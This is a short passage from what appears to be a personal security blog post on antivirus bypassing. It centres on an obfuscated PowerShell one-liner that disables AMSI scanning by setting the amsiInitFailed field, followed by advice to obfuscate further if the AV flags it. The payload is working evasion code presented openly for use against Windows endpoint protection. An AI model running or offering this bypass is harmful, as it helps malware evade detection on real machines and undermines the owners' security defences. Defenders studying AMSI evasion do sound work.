D3Ext/d3ext.github.io/_posts/2022-09-14-AV-Bypassing.md

 ```powershell
 [ReF]."`A$(echo sse)`mB$(echo L)`Y"."g`E$(echo tty)p`E"(( "Sy{3}ana{1}ut{4}ti{2}{0}ils" -f'iUt','gement.A',"on.Am`s",'stem.M','oma') )."$(echo ge)`Tf`i$(echo El)D"(("{0}{2}ni{1}iled" -f'am','tFa',"`siI"),("{2}ubl{0}`,{1}{0}" -f 'ic','Stat','NonP'))."$(echo Se)t`Va$(echo LUE)"($(),$(1 -eq 1))
 ```

+**If any of the methods is detected by the AV you could try to obfuscate the script or code with the mentioned tricks about powershell obfuscation**

 ### How can this help us to bypass AVs?